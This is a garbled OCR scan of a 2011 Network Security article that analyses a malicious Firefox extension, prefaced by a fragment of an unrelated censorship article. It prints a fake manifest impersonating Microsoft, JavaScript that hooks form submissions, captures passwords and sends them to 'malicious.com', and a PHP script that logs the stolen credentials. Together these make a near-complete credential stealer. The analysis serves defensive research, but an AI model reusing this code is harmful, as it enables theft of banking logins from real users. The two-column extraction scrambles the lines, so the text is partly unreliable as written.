Malicious browser extensions can exploit the monolithic and shared namespace design of browsers to steal sensitive user information. They use standard extension APIs and encrypted communications to update other extensions and access browser plugins and vulnerabilities. The browser architecture does not sufficiently restrict extensions' control over browser components or compartmentalize components with customized access policies.

1. FEATURE
circumnavigation talk, and also assumes Times, National Post, and Backbone <http://www.freedomhouse.org/tem-
that usage is only taking place in areas of magazine in addition to editing several plate.cfm?page=664>.
pervasive filtering. It does not, for exam- security and software development titles. 4. Noman, Helmi; York, Jillian.
ple, allow for the many people who will He specialises in security and technology ‘West Censoring East: The Use of
use such tools in less filtered countries to writing, but is also a documentary film Western Technologies by Middle
access video content on sites that restrict maker and is currently working on a non- East Censors, 2010-2011’. OpenNet
it to domestic users for copyright rea- fiction book project. Initiative, 2011. <http://opennet.
sons. Many people use HotspotShield to net/sites/opennet.net/files/ONI_
get to video sites such as Hulu or to use WestCensoringEast.pdf>.
References
the BBC’s iPlayer, for example. 5. Roberts, Hal; Zuckerman, Ethan;
Perhaps, in the broader scheme of 1. Bradbury, Danny. ‘Chaos aims to York, Jillian; Faris, Robert; Palfrey,
things, most residents of heavily cen- crack China’s Wall’. The Guardian, John. ‘2010 Circumvention Tool
sored countries are happy to use those August 2008. <http://www.guardian. Usage Report’. Berkman Center for
countries’ own versions of western co.uk/technology/2008/aug/07/cen- Internet & Society, October 2010.
tools such as search engines and social sorship.hacking>. <http://cyber.law.harvard.edu/publi-
networks. For freedom of speech and 2. Deibert, Ronald; Palfrey, John; cations/2010/Circumvention_Tool_
anti-censorship activists, the biggest chal- Rohozinski, Rafal; Zittrain, Jonathan. Usage>.
lenge may not be technical – it may be ‘Access Controlled: The Shaping 6. Freedom Box Foundation goals page,
convincing others to care. of Power, Rights, and Rule in Feb 2011. <http://freedomboxfoun-
Cyberspace’. MIT Press, April 2010. dation.org/goals/index.en.html>.
<http://www.access-controlled.net/>. 7. Zetter, Kim. ‘WikiLeaks Posts
About the author
3. Kelly, Sanja; Cook, Sarah. ‘Freedom Mysterious ‘Insurance’ File’. Wired,
Danny Bradbury is a freelance technol- On the Net 2011: A Global July 2010. <http://www.wired.com/
ogy writer who has written regularly for Assessment of Internet and Digital threatlevel/2010/07/wikileaks-insur-
titles including The Guardian, Financial Media’. Freedom House, April 2011. ance-file/>.
Spying on the
browser: dissecting
the design of Aditya K Sood Richard J Enbody
malicious extensions
Aditya K Sood and Richard J Enbody, Michigan State University
Browsers are a vital component of every computer system as they serve as the sions are used to steal sensitive informa-
interface to the Internet. However, the extensible nature of browsers has facili- tion.1,2 Bank fraud is a key target for
tated the proliferation of malware infections. In this article, we examine the these malicious extensions.
design of malicious extensions used to steal information from browsers in order
to conduct illegal transactions. The focus is on Mozilla’s Firefox – but other Monolithic design
browsers that share these characteristics will also share similar vulnerabilities. The monolithic design of browsers
is based on the assumption that this
Since a browser is an integral part of rights. In general, malicious extensions approach makes it possible to develop
the client-side framework, extensions exploit the browser’s trust with the code with fewer bugs, because of the
are platform independent because website, when a user initiates a session. reduced complexity when addressing dif-
these extensions communicate with the There have been incidents with Mozilla’s ferent components. The approach uses
operating system using browser access Firefox browser where malicious exten- Inter Process Communication (IPC) to
8
Network Security May 2011

2. FEATURE
extension that is capable of undertaking
the following nefarious activities:
Listing 1: Fake extension
• It can be used with other applications
identity described in RDF format by incorporating a JavaScript wrapper
function.
<?xml version=“1.0”?> • It can perform malicious updates on
<RDF xmlns=“http://www.w3.org/1999/02/22-rdf-syntax-ns#” other installed extensions by using
xmlns:em=“http://www.mozilla.org/2004/em-rdf#”> standard API functionality.4
<Description about=“urn:mozilla:install-manifest”> • It uses asynchronous HTTP requests via
<em:id>Secure Add On</em:id> AJAX, with associated events to gener-
<em:name>Microsoft Safe Browsing Security Policies</em:name> ate listener functions for communica-
<em:description>Protect your computer from security threats tion with third-party servers. It can use
em:description><em:version>3.2.7</em:version> encrypted protocols for data transfer.
<em:creator>Microsoft – 2010</em:creator> • It can interact with the installed plug-
ins, such as PDF or Flash, in order to
<em:homepageURL>http://www.microsoft.com/en/us/default.as launch malicious code and exploit cer-
px</em:homepageURL> tain vulnerabilities in the browser itself.
<em:type>2</em:type>
<! – Mozilla Firefox – > Unified global
<em:targetApplication>
<Description> namespace
<em:id>{ec8030f7-c20a-464f-9b0e-13a3a9e97384}</em:id> Another factor behind the rapid escala-
tion of malicious extensions is the sharing
<em:minVersion>3.0</em:minVersion><em:maxVersion>5.*</em:maxVersion> of the same address space and memory
as that of the parent browser. Malicious
</Description></em:targetApplication></Description></RDF> extensions utilise the global namespace.
As an outcome of this design, unrestricted
achieve co-ordination among compo- which would prohibit the browser from operations in the same address space can
nents. The parent process allocates mem- running extensions. In general, from an result in subverting the browser compo-
ory for all the running instances (tabs) authorisation perspective, there is no nents. Robust policy mechanisms have
of the browser. Similarly, a single process security mechanism applied to extensions. not been deployed for securing the per-
handles all the memory-related opera- Therefore, the browser architecture does sistent state of browser extensions. The
tions. Since browsers run in user space, not restrain control over the interface problem lies in the browser design of not
the monolithic interface allows the code used to carry out the operations within compartmentalising components and
to run freely because user access rights are different browser components. This weak- applying customised access policies based
utilised for operations. This model can be ness provides an opportunity for develop- on individual roles.
exploited by malicious extensions in order ing malicious extensions, thereby exploit-
to exploit these useful components in the Firefox case study:
ing the default behaviour of browsers.
browser address space for nefarious pur-
intrinsic behaviour
poses. Mozilla uses the monolithic model Unrestricted
communication interface and design relevance
for its Firefox browser.
A browser runs in the application
layer (ring 3). However, the components The communication channel between This case study is an outcome of
have elevated privileges to interact effi- different browser components is not real-time analysis of one of the most
ciently with operating system structures. restricted because of interdependency widely used malicious extensions that is
Malicious extensions exploit the follow- among the components. The browser designed for the Mozilla Firefox browser.
ing design components. communication model follows two In order to understand the working
basic patterns of communication named behaviour, it’s necessary to take a close
Insecure sandbox Component-to-Component (C2C) look at the design of this extension, and
and JavaScript-to-Component (J2C). to examine the prototype of this malware
Malicious extensions in Mozilla utilise Most browsers use the Component extension through the use of code snip-
a default extension model for browsers Object Model (COM) for modularisa- pets. Most malware extensions follow
that is actually free from sandboxing.3 tion of code – for example, Mozilla uses the paradigm of a client and server side
There are no appropriate sandbox func- XPCOM. Attackers exploit the default communication model. In addition,
tions incorporated for securing extensions communication model and inherent proprietary browser extensions are also
by reducing privileges and access rights, code modularity to create a malicious vulnerable to security flaws that can be
9
May 2011 Network Security

3. FEATURE
exploited to take control of the entire
system. Related work on securing exten- Listing 2: Wrapper function to steal data in forms
sions has been done to show the process
of designing secure extensions free from
vulnerabilities.5 Of course, malicious window.document.onsubmit = scan_forms;
extensions do not care that extensions
should be secure. //Scan the document forms
Generally, the aim of malicious exten- function scan_forms() {
sions is to steal sensitive data from var forms = content.document.getElementsByTagName(‘form’);
the user and transfer it to an attacker- for(var i=0; i<forms.length; i++) {
controlled domain. Malicious extensions if(forms[i].id)
exploit the trust model used by the var form = content.document.getElementById(forms[i].id);
browser to set a communication channel else
between the browser and the website. var form = content.document.forms[i];
Usually, this process is completed when for(var c=0; c<form.elements.length; c++) {
a session is created with a target web- if(form.elements[c].type == ‘password’ && form.elements[c].value !=
site hosted on third-party servers. The ‘‘)detect_information(form);}}}
point is that malicious extensions are not
protected by HTTP running over SSL. function detect_information(form) {
Most users have a false sense of security //EDIT THIS BELLOW TO MATCH YOUR LOGGIN SCRIPT
when websites use HTTPS. However, var host = ‘http://malicious.com/ff/save_targets.php’;
this is not justified because HTTPS
protects users only from transport layer //Record time and date
attacks. Ironically, HTTPS actually var currentTime = new Date();
protects the malicious session from such var minutes = currentTime.getMinutes();
attacks. HTTPS preserves the integ- if (minutes < 10)
rity of data, but because the malicious minutes = ‘0’ + minutes;
code is within the browser, data can be var date = currentTime.getHours()+’:’+minutes+’ || ‘+currentTime.
manipulated even before it enters the getMonth()+1+’/’+currentTime.getDate()+’/’+currentTime.getFullYear();
network layer. var info = host+’?time=‘+date+’&p-domain=‘+content.document.location.href;
Why doesn’t anti-malware software //Add the collected form data
catch malicious extensions? Malicious for(var c=0; c<form.elements.length; c++)
extensions are not scanned by anti- key_strokes += ‘&’+form.elements[c].name+’=‘+form.elements[c].value;
malware solutions because extensions send(key_strokes);}
are considered to be secure components
by default. We have seen some browser
plug-in integrity checkers that detect
the presence of secure and insecure
plug-ins based on the version informa-
tion. However, for extensions, this ver-
sion scanning technique is not effective
because extensions are not proprietary
code used by vendors or software compa-
nies. As a result, malicious extensions are
not impacted by antivirus solutions.
The basic operation is:
1. A user visits a site that has been
infected with malicious code.
2. The malicious site installs a malicious
extension into the user’s browser.
3. Within the browser the malicious
extension snoops on a user’s browser
activity.
4. Information collected by the mali-
cious extension is sent to an attacker’s
Figure 1: Malicious extension installed in victim’s browser.
remote server.
10
Network Security May 2011

4. FEATURE
steal sensitive data from these forms
Listing 3: Data transference through XMLHttpRequest in order to use information (processed
data) to launch illegal operations ‘on
calls behalf ’ of users. For example, bank
websites require a user to validate a
//Send the information username and password as well as a
function send(key_strokes) { token (sometimes) in order to initi-
var xmlhttp; ate a session for financial transactions.
if (window.XMLHttpRequest) A malicious extension residing in the
xmlhttp = new XMLHttpRequest(); browser uses a wrapper function to
else if (window.ActiveXObject) read the submitted form data con-
xmlhttp = new ActiveXObject(“Microsoft.XMLHTTP”); tinuously. In this way, data is stolen
xmlhttp.open(“GET”,key_strokes,true); well before it enters the network.
xmlhttp.send(null)} The browser’s built-in auto-complete
functionality aids the stealing process.
Visiting malicious description is used by an extension Attackers exploit this design model to
domains manager to display information to
the user. The file shows that the mali-
conduct attacks silently, thereby read-
ing data from the web-based forms.
An attacker coerces legitimate users cious extension installs itself with an The code presented in Listing 2 shows
to visit a malicious domain by using identity of ‘Microsoft Safe Browsing exactly how the data is read from the
different types of web attacks, such as Policies’. From the user’s perspective, forms by malicious extensions.
Cross-Site Scripting (XSS), clickjack- it appears to be from Microsoft so it In Listing 2, a malicious extension
ing, invalidated redirects and phishing must be trustworthy. Figure 1 shows continuously scans and searches the
attacks. The attacker exploits social the malicious extension installed in content rendered in the browser to
engineering networks and popular web- the victim’s browser. find the forms. If the form is active
sites in order to use them as a platform in the session, the code looks for the
for spreading malware. In addition, Snooping form password field. If the password field
once the user visits a malicious domain, is not empty then the scan_forms
the attacker uses social engineering information function calls the detect_information
tricks to distribute malicious extensions. Web forms are used for submitting function in order to collect data from
Effectively, the attacker asks the user to information online to the target web- forms and provide a timestamp. The
install an extension using a false iden- sites. Attackers write hidden code to host information is also collected.
tity, as described next.
Fake extension identity Listing 4: PHP-based logging script
A fake identity is one mode chosen
by attackers to fool users. Any exten- <?php
sion present in the browser is listed in //Open log file to append data
the password manager. The attacker $save = fopen(‘key_strokest.txt’, ‘a’);
can make these extensions covert. For
normal cases, malicious extensions are fwrite($save, “########################################nIP =“.$_
installed using fake identities. This step SERVER***91;’REMOTE_ADDR’***93;.”n”);
is actually a social engineering trick foreach (array_keys($_GET) as $name) {
that exploits the ignorance of the user. if($name == ‘time’)
The trick works because legitimate fwrite($save, ‘TIME =>‘.$_GET***91;’time’***93;.”n”);
users are generally not able to identify elseif($name == ‘p-domain’)
the authentic nature of the extension. fwrite($save, ‘DOMAIN => ‘.$_GET***91;’p-domain’***93;.”n”);
The code snippet presented in Listing 1 else
shows the fake information used by one fwrite($save, $name.’ = ‘.$_GET***91;$name***93;.”n”);
malicious extension. }
This information is extracted from //Close the log file
the install.rdf file that is used to fwrite($save, ‘#####################################’.”nn”);
configure the malicious extension. fclose($save);
This file is used to specify the iden- ?>
tity of the extension. The identity
11
May 2011 Network Security

5. FEATURE
Data transfer attack is performed on a small business research interests are in computer security,
it can yield tens or hundreds of thou- computer architecture, web-based distance
mechanism sands of dollars. education and parallel processing. He has
Once information is stolen, an asyn- The steps discussed above illustrate two patents pending on hardware buffer-
chronous XML-based HTTP request, one instance of extension-based malware overflow protection, which will prevent most
XMLHttpRequest, is used to transfer the that is used to spy on browsers. The case computer worms and viruses. He recently co-
stolen data back to the attacker’s server. study discussed above is an outcome of an authored a CS1 Python book, The Practice
In Listing 3, the function sends all the analysis of a malicious extension that is of Computing using Python. He may be
captured key strokes to the attacker- designed to steal passwords from the login reached at enbody@cse.msu.edu.
controlled domain. These key strokes forms from various browsers. Extension-
Resources
are nothing but data entered in the based malware has a potential impact on
forms during an active session when the the robustness of browsers. In general, • Ter Louw, M; Lim, JS; Venkatakrishnan,
browser is interacting with banking web- it is hard to design dynamic solutions to VN. ‘Enhancing web browser security
sites. The data is captured character by prevent the execution of malicious exten- against malware extensions’. <http://
character and transferred to the attacker’s sions. A user has to be aware of the types www.springerlink.com/content/
server running PHP-based log manage- of extensions running in the browser and e6w885835035ur27/fulltext.pdf>.
ment scripts. their functions. Unauthorised extensions • Florio, Elia; Wüest, Candid. ‘Firefox
(unverified) should not be allowed to and Malware: when your browser
“In general, it is hard to design install in the browser. bites you’. <http://www.virusbtn.
dynamic solutions to prevent com/pdf/conference_slides/2009/
the execution of malicious Conclusion Wueest-Florio-VB2009.pdf>.
extensions. A user has to be
aware of the types of extensions Extensions provide flexibility and portabil-
References
running in the browser and ity in browsers. However, this case study
shows an exploitation of the default design 1. Keizer,G. ‘Mozilla yanks pass-
their functions. Unauthorised
of the browser extension model which word-stealing Firefox add-on’.
extensions (unverified) should poses a serious threat to users. Attackers Computerworld, 14 Jul 2010.
not be allowed to install in the write sophisticated malware to try to Accessed Apr 2011. <http://
browser” exploit the inherent design of browsers. www.computerworld.com/s/arti-
The analysis above shows that extension- cle/9179167/Mozilla_yanks_pass-
PHP-based back-end based malware is very hard to detect and it word_stealing_Firefox_add_on>.
can interact with the operating system with 2. ‘Mozilla Add-on Extension Steals
server log module full privileged rights. This poses a grave Login Details’. Spamfighter, 27 Jul
Malicious extensions communicate with risk to the privacy and security of users. 2010. Accessed Apr 2011. <http://
the back-end servers to store stolen infor- www.spamfighter.com/Mozilla-Add-
mation offsite. The attacker’s back-end on-Extension-Steals-Login-Details-
About the authors
server remains in a listening state in order 14810-News.htm>.
to store information from the infected cli- Aditya K Sood is a security researcher, con- 3. Elliot, Kevin; Binkley, Jim; Hook,
ents. Usually, a PHP-based script is used, sultant and PhD candidate at Michigan James. ‘Mozilla Firefox Extension
as presented in Listing 4, to complete log- State University. He has worked in the Security: an overview of potential
ging operations. The attacker uploads the security domain for Armorize, COSEINC, attack vectors’. 2 Dec 2009. Accessed
PHP file on the domain to open a com- and KPMG and founded SecNiche Apr 2011. <http://web.cecs.pdx.
munication channel between the infected Security. He has been an active speaker at edu/~kevine/cs591_firefox_ext_sec_
browser and the server. conferences such as RSA, Toorcon, Hacker paper.pdf>.
Halted, TRISC, EuSecwest, XCON, 4. Felt, AP. ‘A Survey of Firefox
The theft OWASP AppSec, CERT-IN and has Extension API Use’. 16 Oct 2009.
written content for HITB Ezine, ISSA, Accessed Apr 2011. <http://
The data collected from the browser and ISACA, Elsevier, Hakin9 and Usenix www.eecs.berkeley.edu/Pubs/
then passed to the attacker’s back-end Login. He may be reached at adi_ks@ TechRpts/2009/EECS-2009-139.
server can be from a variety of sources, secniche.org. pdf>.
but one of the most useful is the login Dr Richard Enbody is an Associate 5. Barth, A; Felt, AP; Saxena, P;
and password used for banking. With Professor in the Department of Computer Boodman, A. 2009. ‘Protecting
that information in hand, an attacker Science and Engineering, Michigan State Browsers from Extension
can clean out a bank account. If this University. He joined the faculty in 1987 Vulnerabilities’. 2009. <http://www.
attack is performed on an individual it after earning his PhD in Computer Science cs.berkeley.edu/~afelt/secureexten-
can yield thousands of dollars, but if the from the University of Minnesota. His sions.pdf>.
12
Network Security May 2011